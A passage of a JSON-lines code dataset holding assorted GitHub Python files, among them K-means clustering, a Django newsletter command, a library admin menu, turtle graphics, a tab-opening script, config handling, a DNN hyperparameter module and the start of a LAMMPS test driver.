-1\r\n for i in range(len(dist)):\r\n if dist[i] < min_:\r\n min_ = dist[i]\r\n minIndex = i\r\n return minIndex\r\n\r\n def getEuclideanDist(self, x1, y1, x2, y2):\r\n dist = sqrt(pow((x2 - x1), 2) + pow((y2 - y1), 2))\r\n return dist\r\n\r\n def getCentroid(self, cluster):\r\n x_sum, y_sum = 0.0, 0.0\r\n size = len(cluster)\r\n for p in cluster:\r\n x_sum += p.x\r\n y_sum += p.y\r\n\r\n return Centroid(x_sum / size, y_sum / size)\r\n\r\n @staticmethod\r\n def getMaxClusterLabel(cluster):\r\n labelCounts = {}\r\n for point in cluster:\r\n if point.label not in labelCounts:\r\n labelCounts[point.label] = 0\r\n labelCounts[point.label] += 1\r\n max = -sys.maxint - 1\r\n for label in labelCounts:\r\n if max < labelCounts[label]:\r\n max = labelCounts[label]\r\n return max\r\n\r\n @staticmethod\r\n def readDataSet(filePath):\r\n dataSet = []\r\n with open(filePath) as f:\r\n lines = f.readlines()\r\n lines = [x.strip() for x in lines]\r\n for line in lines:\r\n points = line.split('\\t')\r\n x = float(points[0])\r\n y = float(points[1])\r\n label = int(points[2])\r\n point = DataPoints(x, y, label)\r\n dataSet.append(point)\r\n return dataSet\r\n\r\n\r\nif __name__ == \"__main__\":\r\n k = KMeans()\r\n k.main(None)\r\n","repo_name":"shunjizhan/clustering","sub_path":"KMeans.py","file_name":"KMeans.py","file_ext":"py","file_size_in_byte":5580,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"18304058576","text":"from django.core.management.base import BaseCommand\n\nfrom newsletter.models import Client\nfrom newsletter.services.email import send_newsletter_email\n\n\nclass Command(BaseCommand):\n help = \"Send the newsletter to subscribers\"\n\n def add_arguments(self, parser):\n parser.add_argument(\n \"-b\", \"--batch\", type=int, help=\"How many emails should be sent in one go?\"\n )\n\n def handle(self, *args, **kwargs):\n subscribed_clients = Client.objects.subscribed()\n batch_size = kwargs[\"batch\"]\n if batch_size:\n send_newsletter_email(subscribed_clients, batch_size)\n else:\n send_newsletter_email(subscribed_clients)\n self.stdout.write(\"Newsletter has been sent to subscribers\")\n","repo_name":"osamahasanone/payla","sub_path":"app/newsletter/management/commands/sendnewsletter.py","file_name":"sendnewsletter.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32862362606","text":"import string_utils\nimport updateProcedures\nimport fetchProcedures\nimport addProcedures\nimport deleteProcedures\n\ndef start(self):\n print(\"What would you like to do?\\n\")\n self.choice = input(\"1) Add Borrower\\n2) Update Borrower\\n3) Delete Borrower\\n\")\n if self.choice == \"1\":\n add_borrower(self)\n elif self.choice == \"2\":\n update_borrower(self)\n elif self.choice == \"3\":\n delete_borrower(self)\n else:\n print(\"Must enter a valid option (ie 1, 2, 3)\")\n start(self)\n\ndef add_borrower(self):\n self.store[\"name\"] = input(\"What is the name of your new borrower\\n\")\n self.store[\"address\"] = input(\"What's the address of your borrower\\n\")\n self.store[\"phone\"] = input(\"Lastly, what is the phone number of your borrower\\n\")\n addProcedures.addBorrower(self.store[\"name\"],self.store[\"address\"],self.store[\"phone\"])\n\ndef update_borrower(self):\n borrowerList=fetchProcedures.fetchBorrowers()\n borrowers = string_utils.display_input_options(borrowerList)\n borrowerChoice=input(borrowers+\" Enter borrower card # you want to update?\\n\")\n bNewName=input(\"Enter the borrowers new name.\\n\")\n bNewAddress=input(\"Enter \"+bNewName+\" new address.\\n\")\n bNewPhone=input(\"Enter \"+bNewName+\" new phone number. \\n\")\n updateProcedures.updateBorrowerInfo(borrowerChoice,bNewName,bNewAddress,bNewPhone)\n print(\"Updating Borrower\")\n\ndef delete_borrower(self):\n borrowerList=fetchProcedures.fetchBorrowers()\n borrowers = string_utils.display_input_options(borrowerList)\n borrowerChoice=input(borrowers+\" Enter borrower card # you want to delete?\\n\")\n deleteProcedures.deleteBorrower(borrowerChoice)\n print(\"Deleting Borrower\")","repo_name":"WillCaoSmoothstack/Week1Project","sub_path":"admin_q_borrower.py","file_name":"admin_q_borrower.py","file_ext":"py","file_size_in_byte":1696,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"44117268984","text":"import json\nimport uuid\n\nfrom django.http import HttpResponse, HttpResponseServerError, HttpResponseNotFound\nfrom rest_framework.decorators import api_view\n\nfrom score.models import Score\n\n\n@api_view(['POST'])\ndef update(request):\n try:\n json_data = json.loads(request.body)\n user_id = uuid.UUID(json_data['userId'])\n score = Score.objects.get(userId=user_id)\n if json_data['coin'] is not None:\n score.coin = json_data['coin']\n if json_data['gem'] is not None:\n score.gem = json_data['gem']\n if json_data['cup'] is not None:\n score.cup = json_data['cup']\n if json_data['score'] is not None:\n score.score = json_data['score']\n if json_data['level'] is not None:\n score.level = json_data['level']\n if json_data['rank'] is not None:\n score.rank = json_data['rank']\n if json_data['xp'] is not None:\n score.xp = json_data['xp']\n if json_data['fan'] is not None:\n score.fan = json_data['fan']\n score.save()\n return HttpResponse(json.dumps({\"status\": \"success\"}))\n except (KeyError, ValueError, json.decoder.JSONDecodeError):\n return HttpResponseServerError(json.dumps({\"status\": \"badRequest\", \"error\": \"Malformed data\"}))\n except Score.DoesNotExist:\n return HttpResponseNotFound(json.dumps({\"status\": \"doesNotExist\", \"error\": \"Score does not exist\"}))\n","repo_name":"hsarraf/casualkit-django-server","sub_path":"score/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1448,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15949848500","text":"# file mode handling\n\n# for opening file:\n# Function: open(param1, param2, param3)\n\n# param1: file name\n# param2: access mode\n# param3: Buffering\n\n# file opening and read\n\nopen_file = open('test.txt')\nfile_read = open_file.read()\nprint('Read a file',file_read)\nopen_file.close()\n\n\n# file write\n\nwrite_file = open('test_1.txt', mode='w+' )\nwrite_file.write('I am learing python programming')\nwrite_file.seek(0)\nprint(write_file.read())\nwrite_file.close()\n\n# write_new_file = open('test_2.txt', 'w')\n# write_new_file.write('line number one !')\n# print(\"write test_2::\"write_new_file.read())\n# write_new_file.close()\n\n# file Append\n\nappend_file = open(\"test_2.txt\", 'a')\nappend_file.write(\"\\n Hello python append methods\")\nprint(append_file)\nappend_file.close()\n\n\n# Using with\n\nwith open('test.txt', mode='r') as f:\n file_data = f.read()\n print(file_data)\n\n# using readline\n\nwith open(\"test.txt\", 'r') as f:\n lines = f.readlines()\n print(lines)\n print('\\n', lines[1])\n ","repo_name":"Habibur-Rahman0927/1_months_Python_Crouse","sub_path":"Python All Day Work/04-05-2021 Days Work/Task_2_file_mode_use.py","file_name":"Task_2_file_mode_use.py","file_ext":"py","file_size_in_byte":984,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"27782991623","text":"import turtle\r\nfrom tkinter import *\r\nimport time\r\nfrom PIL import ImageGrab, Image\r\nimport random\r\n\r\n\r\ndef get_pixel(widget, x, y):\r\n\tImageGrab.grab().crop((x, y, x + 1, y + 1)).save(\"C:\\\\Users\\\\Tate\\\\Desktop\\\\image.png\")\r\n\r\n\r\ndef get_pixel_color(pixel):\r\n\tim = Image.open(\"C:\\\\Users\\\\Tate\\\\Desktop\\\\image.png\")\r\n\tpix = im.load()\r\n\trgb = pix[0, 0]\r\n\tprint(rgb)\r\n\tif sum(list(rgb)) < 128:\r\n\t\treturn \"black\"\r\n\telif rgb == (255, 255, 255):\r\n\t\treturn \"white\"\r\n\telif rgb == (255, 0, 0):\r\n\t\treturn \"red\"\r\n\telif rgb == (0, 0, 255):\r\n\t\treturn \"blue\"\r\n\telif rgb == (0, 128, 0):\r\n\t\treturn \"white\"\r\n\r\n\r\ndef square(t, length):\r\n\tfor i in range(4):\r\n\t\tt.fd(length)\r\n\t\tt.lt(90)\r\n\r\n\r\ndef polyline(t, length, n, angle):\r\n\tfor i in range(int(n)):\r\n\t\tt.fd(length)\r\n\t\t\"\"\"\r\n\t\tx = t.xcor() + 43\r\n\t\ty = -t.ycor() + 77\r\n\t\tcolor = get_pixel_color(get_pixel(canvas, x, y))\r\n\t\tif color == \"red\":\r\n\t\t\tt.rt(angle)\r\n\t\t\tt.fillcolor(\"green\")\r\n\t\telif color == \"green\":\r\n\t\t\tt.lt(angle)\r\n\t\t\tt.fillcolor(\"blue\")\r\n\t\telif color == \"blue\":\r\n\t\t\tt.rt(angle)\r\n\t\t\tt.fillcolor(\"red\")\r\n\t\telif color == \"black\":\r\n\t\t\tt.fd(10)\r\n\t\t\tflower(t, random.randint(100,200), 5, 30)\r\n\t\t\"\"\"\r\n\t\tt.lt(angle)\r\n\r\n\r\ndef polygon(t, length, n):\r\n\tangle = 360.0 / n\r\n\tpolyline(t, length, n, angle)\r\n\r\n\r\ndef circle(t, r, n):\r\n\tc = 2 * 3.1415926 * r\r\n\tpolygon(t, c / n, n)\r\n\r\n\r\ndef arc(t, r, angle):\r\n\tarc_length = 2 * 3.141526 * r * abs(angle) / 360\r\n\tn = int(arc_length / 4) + 3\r\n\tstep_length = arc_length / n\r\n\tstep_angle = float(angle) / n\r\n\r\n\tt.lt(step_angle / 2)\r\n\tpolyline(t, step_length, n, step_angle)\r\n\tt.rt(step_angle / 2)\r\n\r\n\r\ndef flower(t, r, n, angle):\r\n\tif n != nmax:\r\n\t\tt.fd(r*2)\r\n\t\theading = t.heading()\r\n\tfor i in range(int(n)):\r\n\t\tif i % 2 == 0:\r\n\t\t\tt.fillcolor(\"blue\")\r\n\t\telse:\r\n\t\t\tt.fillcolor(\"green\")\r\n\t\tpetal(t, r, n, angle)\r\n\t\tt.lt(360.0 / n)\r\n\t\tt.lt(180-angle)\r\n\tif n != nmax:\r\n\t\tt.setheading(heading)\r\n\t\tt.bk(r*2)\r\n\r\n\r\n\r\n\r\ndef petal(t, r, n, angle):\r\n\tif n == 6:\r\n\t\tt.fillcolor(\"purple\")\r\n\telif n == 5:\r\n\t\tt.fillcolor(\"indigo\")\r\n\telif n == 4:\r\n\t\tt.fillcolor(\"navy\")\r\n\telif n == 3:\r\n\t\tt.fillcolor(\"sea green\")\r\n\telif n == 2:\r\n\t\tt.fillcolor(\"goldenrod\")\r\n\tt.begin_fill()\r\n\r\n\tarc(t, r, angle)\r\n\theading = t.heading()\r\n\tx = t.xcor()\r\n\ty = t.ycor()\r\n\tt.lt(180 - angle)\r\n\tarc(t, r, angle)\r\n\tt.end_fill()\r\n\tt.up()\r\n\tt.goto(x,y)\r\n\tt.down()\r\n\tt.setheading(heading)\r\n\tif r >= 5:\r\n\t\tflower(t, r / 3, n - 1, angle)\r\n\r\n\tarc(t, r, angle)\r\n\r\n\r\n\r\nroot = Tk()\r\nroot.withdraw()\r\nbob = turtle.Turtle()\r\ncanvas = turtle.getcanvas()\r\nscreen_width = 1200\r\nscreen_height = 1200\r\nbob.screen.setup(screen_width, screen_height, 0, 0)\r\nbob.screen.setworldcoordinates(0, -screen_height, screen_width, 0)\r\n# bob.hideturtle()\r\nbob.speed(0)\r\nbob.up()\r\nbob.goto(screen_width / 2, -7*screen_height / 8)\r\nbob.down()\r\n# n=11, rmin=50, r/2, n-1\r\nnmax = 5\r\nflower(bob, 200, nmax, 75)\r\n\r\nturtle.mainloop()\r\n","repo_name":"tate-jenkins/CS290","sub_path":"flower_abstract.py","file_name":"flower_abstract.py","file_ext":"py","file_size_in_byte":2828,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10661558756","text":"\"\"\"\r\n-------------------------------------------------------\r\n[Simple Browser Spammer]\r\n-------------------------------------------------------\r\nAuthor: Luka Senfner\r\nID: 210729560\r\nEmail: senfl5620@gmail.com\r\n__updated__ = \"2022-02-15\"\r\n-------------------------------------------------------\r\n\"\"\"\r\n# Imports\r\nimport webbrowser\r\nfrom time import sleep\r\nfrom platform import system\r\n\r\n\r\ndef getos():\r\n os_type = system()\r\n browser(os_type)\r\n\r\n\r\ndef browser(os_type):\r\n if os_type == 'Windows':\r\n os_default = 'windows-default'\r\n elif os_type == 'Darwin':\r\n os_default = 'macosx'\r\n URL = str(input(\"Paste the URL of the website you want to go to: \"))\r\n num_times_open = int(\r\n input(\"How many times do you want the link to open in a new tab?: \"))\r\n\r\n if num_times_open > 0:\r\n webbrowser.get(os_default).open_new(URL)\r\n else:\r\n print(\"You broke me! Try again\")\r\n if num_times_open > 1:\r\n for i in range(num_times_open - 1):\r\n webbrowser.get(os_default).open_new_tab(URL)\r\n sleep(.15)\r\n\r\n\r\ngetos()\r\n","repo_name":"Luka-SA/browser_spammer","sub_path":"browser_spammer.py","file_name":"browser_spammer.py","file_ext":"py","file_size_in_byte":1096,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"23402552590","text":"import json\nimport os\n\n\ndefault_section = \"telegram\"\ndefault_config_path = \"./config.json\"\n\n\nclass ConfigException(Exception):\n pass\n\n\nclass ConfigFileMissing(ConfigException):\n pass\n\n\nclass ConfigSectionMissing(ConfigException):\n pass\n\n\nclass Config:\n\n def __init__(self, path: str = None):\n self.path = path if path else default_config_path\n self._dict = {}\n\n @staticmethod\n def get_full_option_name(section: str, option: str) -> str:\n return f\"{section}_{option}\"\n\n @staticmethod\n def get_env_var(section: str, option: str = None, fallback: str = None) -> str:\n _var_name = Config.get_full_option_name(section, option)\n return os.getenv(_var_name, fallback)\n\n def open(self, config_path: str = None) -> {str: str}:\n if config_path:\n self.path = config_path\n if os.path.isfile(self.path):\n with open(self.path) as c:\n self._dict = json.loads(c.read())\n return self\n else:\n raise ConfigFileMissing(\"Config file does not exists\")\n\n def copy(self):\n return self._dict\n\n def get_section(self, section: str) -> {str: str}:\n if section in self._dict.keys():\n return self._dict[section]\n else:\n raise ConfigSectionMissing(\"Section does not exists\")\n\n def has_section(self, section: str) -> bool:\n try:\n return section in self._dict.keys()\n except KeyError:\n return False\n\n def get(self, section: str, option: str = None, fallback=None):\n if option is None:\n option = section\n section = default_section\n if self.get_env_var(section, option):\n return self.get_env_var(section, option)\n else:\n if option in self._dict[section].keys():\n return self._dict[section][option]\n else:\n return fallback\n\n def has(self, section: str, option: str = None) -> bool:\n if option is None:\n option = section\n section = default_section\n try:\n return bool(self.get_env_var(section, option)) or option in self._dict[section].keys()\n except KeyError:\n return False\n","repo_name":"xpavlus/tg-bot","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2244,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72620358313","text":"from typing import List\r\nfrom collections import defaultdict\r\n \r\ndef dfs_helper(u, adj, visited):\r\n stack = [u]\r\n while stack:\r\n v = stack.pop()\r\n if not visited[v]:\r\n visited[v] = True\r\n for neighbor in adj[v]:\r\n if not visited[neighbor]:\r\n stack.append(neighbor)\r\n\r\n \r\n# def getTransposeGraph(adj):\r\n# n = len(adj)\r\n# trans_adj = [[] for _ in range(n)]\r\n# for u in range(n):\r\n# for v in adj[u]:\r\n# trans_adj[v].append(u)\r\n# return trans_adj\r\n \r\ndef findAllMotherVertices(adj,trans_adj):\r\n n = len(adj)\r\n visited = initialize_visited(n)\r\n \r\n last_dfs_called_on = -1\r\n \r\n for u in range(n):\r\n if not visited[u]:\r\n dfs_helper(u, adj, visited)\r\n last_dfs_called_on = u\r\n\r\n visited = initialize_visited(n)\r\n visited = [False for _ in range(n)]\r\n dfs_helper(last_dfs_called_on, adj, visited)\r\n \r\n for u in range(n):\r\n if not visited[u]:\r\n return []\r\n motherVertex = last_dfs_called_on\r\n # trans_adj1 = getTransposeGraph(adj)\r\n\r\n visited = initialize_visited(n)\r\n dfs_helper(motherVertex, trans_adj, visited)\r\n \r\n\r\n ans = []\r\n \r\n for u in range(n):\r\n if visited[u]:\r\n ans.append(u)\r\n \r\n return ans\r\n\r\n\r\nn, m = map(int, input().split())\r\nadjacency_list = [ [] for i in range(n)]\r\ntrans_adj = [[] for _ in range(n)]\r\n# adjacency_list = defaultdict(list)\r\n# trans_adj = defaultdict(list)\r\nfor _ in range(m):\r\n a, b = map(int, input().split())\r\n trans_adj[a-1].append(b-1)\r\n adjacency_list[b-1].append(a-1)\r\n# print(adjacency_list)\r\nmotherVertices = findAllMotherVertices(adjacency_list,trans_adj)\r\nfor i in range(len(motherVertices)):\r\n motherVertices[i] += 1\r\n\r\nprint(len(motherVertices))\r\nprint(\" \".join(map(str, motherVertices)))","repo_name":"ashwinnellimuttath/Algorithms-Coursework-UCR","sub_path":"5assignment/challenge/capital/4capital.py","file_name":"4capital.py","file_ext":"py","file_size_in_byte":1859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"21912494336","text":"import os\nimport shlex\nimport sys\n\nfrom invoke import task, util\n\n\nin_ci = os.environ.get(\"CI\", \"false\") == \"true\"\nif in_ci:\n pty = False\nelse:\n pty = util.isatty(sys.stdout) and util.isatty(sys.stderr)\n\n\nCODE_PATHS = (\n \"isbinary\",\n \"tests\",\n \"tasks.py\",\n)\n\n\ndef _quote(*args: str) -> str:\n return \" \".join(map(shlex.quote, args))\n\n\n@task\ndef reformat(c):\n c.run(_quote(\"isort\", \"--skip=/tests/fixtures/\", *CODE_PATHS), pty=pty)\n c.run(_quote(\"black\", \"--exclude=/tests/fixtures/\", *CODE_PATHS), pty=pty)\n\n\n@task\ndef lint(c):\n flake8_args = (\"flake8\", \"--show-source\", \"--statistics\", \"--exclude\", \"tests/fixtures\")\n c.run(_quote(*flake8_args, *CODE_PATHS), pty=pty)\n\n\n@task\ndef test(c, onefile=\"\", verbose=False):\n pytest_args = [\n \"pytest\",\n \"--strict-config\",\n \"--cov=isbinary\",\n \"--cov-report=term-missing\",\n \"--ignore=tests/fixtures\",\n ]\n if in_ci:\n pytest_args.extend((\"--cov-report=xml\", \"--strict-markers\"))\n else:\n pytest_args.append(\"--cov-report=html\")\n\n if onefile:\n pytest_args.append(onefile)\n\n if verbose:\n pytest_args.append(\"-vv\")\n\n c.run(_quote(*pytest_args), pty=pty)\n\n\n@task\ndef type_check(c):\n c.run(_quote(\"mypy\", *CODE_PATHS), pty=pty)\n\n\n@task\ndef docs(c):\n with c.cd(\"docs\"):\n c.run(\"sphinx-build -M html source build -a -W\", pty=pty)\n","repo_name":"djmattyg007/python-isbinary","sub_path":"tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":1387,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"41878427716","text":"\"\"\"\nGiven an m x n matrix, return all elements of the matrix in spiral order.\n\n\n\nExample 1:\n\n\nInput: matrix = [[1,2,3],[4,5,6],[7,8,9]]\nOutput: [1,2,3,6,9,8,7,4,5]\n\nExample 2:\n\n\nInput: matrix = [[1,2,3,4],[5,6,7,8],[9,10,11,12]]\nOutput: [1,2,3,4,8,12,11,10,9,5,6,7]\n\n\nConstraints:\n\nm == matrix.length\nn == matrix[i].length\n1 <= m, n <= 10\n-100 <= matrix[i][j] <= 100\n\"\"\"\nfrom typing import List\n\n\nclass Solution1:\n def spiralOrder(self, matrix: List[List[int]]) -> List[int]:\n result = []\n row = len(matrix)\n col = len(matrix[0])\n left, right, top, bottom = 0, col - 1, 0, row - 1\n while True:\n for j in range(left, right + 1):\n result.append(matrix[top][j])\n top += 1\n if top > bottom:\n break\n for i in range(top, bottom + 1):\n result.append(matrix[i][right])\n right -= 1\n if left > right:\n break\n for j in range(right, left - 1, -1):\n result.append(matrix[bottom][j])\n bottom -= 1\n if top > bottom:\n break\n for i in range(bottom, top - 1, -1):\n result.append(matrix[i][left])\n left += 1\n if left > right:\n break\n return result\n","repo_name":"qianbinbin/leetcode","sub_path":"python3/leetcodepy/spiral_matrix.py","file_name":"spiral_matrix.py","file_ext":"py","file_size_in_byte":1326,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"7996814990","text":"\"\"\"\n\nThis file contains functions related to initializing the constants and \nhyperparameters that are used throughout DNN training and evaluation scripts. \nThe primary purpose of all of these functions is to return a dict structure to \nour primary analysis scripts.\n\n\"\"\"\n\nimport torch.nn as nn\n\n# %% Get Constants\n\n\ndef get_constants(device='cpu',\n PATH=\"../results/training results\",\n input_size=1,\n output_size=1,\n lr_step_size=1,\n lr_patience=1,\n min_lr=1e-5,\n num_trials=1,\n num_timestepsPerTrial=10000,\n criterion=nn.MSELoss(),\n num_epochs=1000,\n optuna_trials=3,\n optuna_timeout=None,\n prediction_horizon=1,\n fs=1000,\n fsNew=30,\n early_stopping_patience=5\n ):\n \"\"\"\n Set constants (parameters not optimized with Optuna) and return as a \n dictionary structure\n\n Parameters\n ----------\n device : string\n An object that represents the device on which a tensor will be \n allocated during the DNN training process. \n The default is 'cpu'.\n PATH : string\n The filepath that is used to save the DNN evaluation results. \n The default is a results folder within the project.\n input_size : int\n The number of DNN input features used as predictors. \n The default is 1.\n output_size : int\n The number of DNN output target variables (response). \n The default is 1.\n lr_step_size : int\n Number of epochs with no improvement after which learning rate will be \n reduced. For example, if lr_step_size = 2, then we will ignore the \n first 2 epochs with no improvement, and will only decrease the LR after \n the 3rd epoch if the loss still hasn’t improved then. \n The default is 1.\n lr_patience : int\n Number of epochs to wait before resuming normal operation after lr has \n been reduced.\n The default is 1.\n min_lr : float\n A lower bound on the learning rate. \n The default is 1e-5.\n num_trials : int\n The number of data trials within the dataset. This value is important \n for constructing tensors and training batches. \n The default is 1.\n num_timestepsPerTrial : int\n The number of timesteps (samples) per data trial.\n The default is 10000.\n criterion : torch.nn.modules.loss\n The loss function used during the DNN training process. Loss functions \n are used to gauge the error between the prediction output and the \n provided target value.\n The default is torch.nn.MSELoss().\n num_epochs : int, optional\n An epoch is a measure of the number of times all training data is used \n once to update the parameters\n The default is 1000.\n optuna_trials : int, optional\n The number of iterations that Optuna executes its evaluation of an \n objective function. Each trial suggests values of hyperparameters based\n on Optuna's search crtieria. \n The default is 100.\n optuna_timeout : float, optional\n Stop Optuna study after the given number of second(s). If this argument \n is set to None, the study is executed without time limitation. \n The default is None.\n Data : dict, optional \n This dictionary has keys for \"data\" and \"file names\".\n \"file names\" links to a list of file names. \"data\" links to additional\n dictionaries where file names are keys and values are Pandas dataframes \n with data and metadata, respectively. \n The default is a blank dictionary.\n prediction_horizon : int, optional\n How many timesteps/samples ahead the DNN model predicts into the \n future.\n The default is 1.\n fs : int\n The sample rate that the time series data was collected in Hz.\n The default is 1000.\n fsNew : int\n The value to resample the time series data in Hz. The resampled signal \n starts at the same value as the original signal but is sampled \n differently acording to fsNew. A Fourier method is used so the time\n series signals must be periodic. \n The default is 30.\n early_stopping_Patience : int\n This is the number of epochs without improvement after which training \n will be early stopped. A larger patience means that an experiment will \n wait longer before stopping an experiment.\n\n Returns\n -------\n constants : dict\n This dictionary has the name of each constant as keys and their values. \n This dict contains constant information to be passed across \n various DNN training and evaluation functions. The data within this \n dict is not meant to be changed after initialization (i.e., these are \n values that Optuna does not optimize)\n\n \"\"\"\n\n constants = {'device': device,\n 'results path': PATH,\n 'input size': input_size,\n 'output size': output_size,\n 'learning rate scheduler delay': lr_step_size,\n 'learning rate scheduler patience': lr_patience,\n 'minimum learning rate': min_lr,\n 'number of walking trials': num_trials,\n 'number of timesteps per trial': num_timestepsPerTrial,\n 'loss function': criterion,\n 'max number of epochs': num_epochs,\n 'number of optuna trials': optuna_trials,\n 'optuna timeout': optuna_timeout,\n 'prediction horizon': prediction_horizon,\n 'original sample freq': fs,\n 'sub-sample freq': fsNew,\n 'early stopping patience': early_stopping_patience\n }\n\n return constants\n\n\n# %% Get Hyperparamter Ranges\n\ndef get_hyperparameter_ranges(seq_len=[2, 20],\n lr=[1e-5, 1e-1],\n weight_decay = [1e-5, 1e-1], \n gamma = [0.1, 0.9],\n num_layers=[1, 3],\n num_HUs_pow=[4, 9],\n dropout=[0.1, 0.5],\n P=[4, 7],\n batch_pow=[4, 8],\n noise_std=[0.1, 1]\n ):\n \"\"\"\n Sets the hyperparameter ranges used during the Optuna optimization trials. \n Each input parameter is a list of two elements (lower and upper bounds of \n the hyperparameter range) and the output is a dictionary containing the \n names of each hyperparameter and the range values. \n\n Parameters\n ----------\n seq_len : list of int, optional\n Sequence Length is the length of the historical sequence of input data. \n If the sequence length is N, then the window range of the input data \n will be from samples [0:-1,-2,...,-N].\n The default is [2,20].\n lr : list of float, optional\n The learning rate is a hyperparameter that controls how much to change \n the model in response to the estimated error each time the model \n weights are updated.\n The default is [1e-5, 1e-1].\n gamma : list of float, optional\n The weight decay which is a regularization technique used by adding a \n small penalty (L2 norm of all the weights of the model) to the loss \n function.\n The default is [1e-5, 1e-1].\n num_layers : list of int, optional\n The number of layers in the DNN\n The default is [1,3].\n num_HUs_pow : list of int, optional\n The powers of 2 for the neural network layers' number of hidden units.\n Searching in powers of two reduces the search space logarithmically.\n The default is [4,9].\n dropout : list of float, optional\n Probability of an element to be zeroed during training. This is a \n regularization technique used to avoid overfitting. \n The default is [0.1, 0.5].\n P : list of int, optional\n The powers of 2 for the DARNN's number of decoder units.\n The default is [4,7].\n batch_pow : list of int, optional\n The powers of 2 for the batch size. Batch size is a term used in \n machine learning and refers to the number of training examples \n utilized in one iteration.\n The default is [4,8].\n noise_std : list of float, optional\n The standard deviation of the noise injected on to the training data. \n This random noise is added to each training sample to reduce the chance\n of overfitting.\n The default is [0.1, 1].\n\n Returns\n -------\n hp_ranges : dict\n This dictionary has the name of each hyperparameter as keys and the\n range that Optuna will search as values. Each input parameter for this \n function is a list of 2 elements where the first element is the lower \n bound of the search range and the second element is the upper bound of \n the search range. Note that some hyperparameters are only used for \n specific DNN types. \n\n \"\"\"\n\n hp_ranges = {\n 'sequence length': seq_len,\n 'learning rate': lr,\n 'weight decay': weight_decay,\n 'scheduler factor': gamma,\n 'number of layers': num_layers,\n 'hidden units power': num_HUs_pow,\n 'dropout factor': dropout,\n 'decoder hidden units power': P,\n 'batch size power': batch_pow,\n 'noise STD': noise_std\n }\n\n return hp_ranges\n","repo_name":"chrisprasanna/RoboAnkle_DeepLearning","sub_path":"src/set_parameters.py","file_name":"set_parameters.py","file_ext":"py","file_size_in_byte":9697,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"22651276024","text":"def create_endpoints(app, movie_info_service, rec_service, search_service):\n @app.route('/api/ping', methods=['GET'])\n def ping():\n return 'pong!'\n\n @app.route('/api/', methods=['GET'])\n def home():\n front_rec = rec_service.get_front_rec()\n return {\n 'front_rec': front_rec\n }\n \n @app.route('/api/movies/', methods=['GET'])\n def movie(movie_id):\n movie_info = movie_info_service.get_movie_info(movie_id)\n actor_rec = rec_service.get_actor_rec(movie_id)\n director_rec = rec_service.get_director_rec(movie_id)\n similar_rec = rec_service.get_similar_rec(movie_id)\n return {\n 'movie_info': movie_info,\n 'actor_rec': actor_rec,\n 'director_rec': director_rec,\n 'similar_rec': similar_rec\n }\n\n @app.route('/api/search/', methods=['GET'])\n def search(keyword):\n return search_service.search(keyword)","repo_name":"cornandme/mirror-movie","sub_path":"src/api/view/view.py","file_name":"view.py","file_ext":"py","file_size_in_byte":981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10258365238","text":"# LAMMPS regression test driver using Python's unittest\nfrom __future__ import print_function\n__author__ = 'Richard Berger'\n__email__ = \"richard.berger@temple.edu\"\n\nimport unittest\nimport os\nimport sys\nimport shlex\nfrom datetime import datetime\nfrom subprocess import call, Popen, PIPE\n\n# Before running any tests these two environment variables must be set\n\n# full path of LAMMPS main directory\nLAMMPS_DIR=os.environ['LAMMPS_DIR']\n\n# full path of LAMMPS binary being tested\nLAMMPS_BINARY=os.environ['LAMMPS_BINARY']\n\n# one of openmpi, mpich\nLAMMPS_MPI_MODE=os.environ.get('LAMMPS_MPI_MODE', 'openmpi')\n\n# test modes separated by colons. e.g. serial:parallel:omp:valgrind\nLAMMPS_TEST_MODES=os.environ.get('LAMMPS_TEST_MODES', 'serial').split(':')\n\n# list of folders which should be scanned for tests\nLAMMPS_TEST_DIRS=os.environ.get('LAMMPS_TEST_DIRS', '').split(':')\n\nclass LAMMPSTestCase:\n \"\"\" Mixin class for each LAMMPS test case. Defines utility function to run in serial or parallel\"\"\"\n def run_script(self, script_path, nprocs=1, nthreads=1, ngpus=1, screen=True, log=None, launcher=[], force_openmp=False, force_mpi=False, force_gpu=False, force_kokkos=False, force_cuda=False, test_name=\"\"):\n working_dir = os.path.dirname(script_path)\n script_name = os.path.basename(script_path)\n\n if screen:\n output_options = []\n else:\n output_options = [\"-screen\", \"none\"]\n\n if log:\n output_options += [\"-log\", log]\n\n exe = launcher + [LAMMPS_BINARY]\n\n mpi_options = []\n lammps_options = [\"-in\", script_name] + output_options\n\n if nthreads > 1 and force_openmp:\n lammps_options += [\"-sf\", \"omp\", \"-pk\", \"omp\", str(nthreads)]\n\n if force_kokkos:\n lammps_options += [\"-k\", \"on\"]\n if nthreads > 1:\n lammps_options += [\"t\", str(nthreads)]\n if force_cuda:\n lammps_options += [\"g\", str(ngpus)]\n lammps_options += [\"-sf\", \"kk\", \"-pk\", \"kokkos newton on neigh half\"]\n\n if force_gpu:\n lammps_options += [\"-pk\", \"gpu\", \"1\", \"-sf\", \"gpu\"]\n\n if nprocs > 1 or force_mpi:\n mpi_options = [\"mpirun\", \"-np\", str(nprocs)]\n if LAMMPS_MPI_MODE == \"openmpi\":\n mpi_options += [\"-x\", 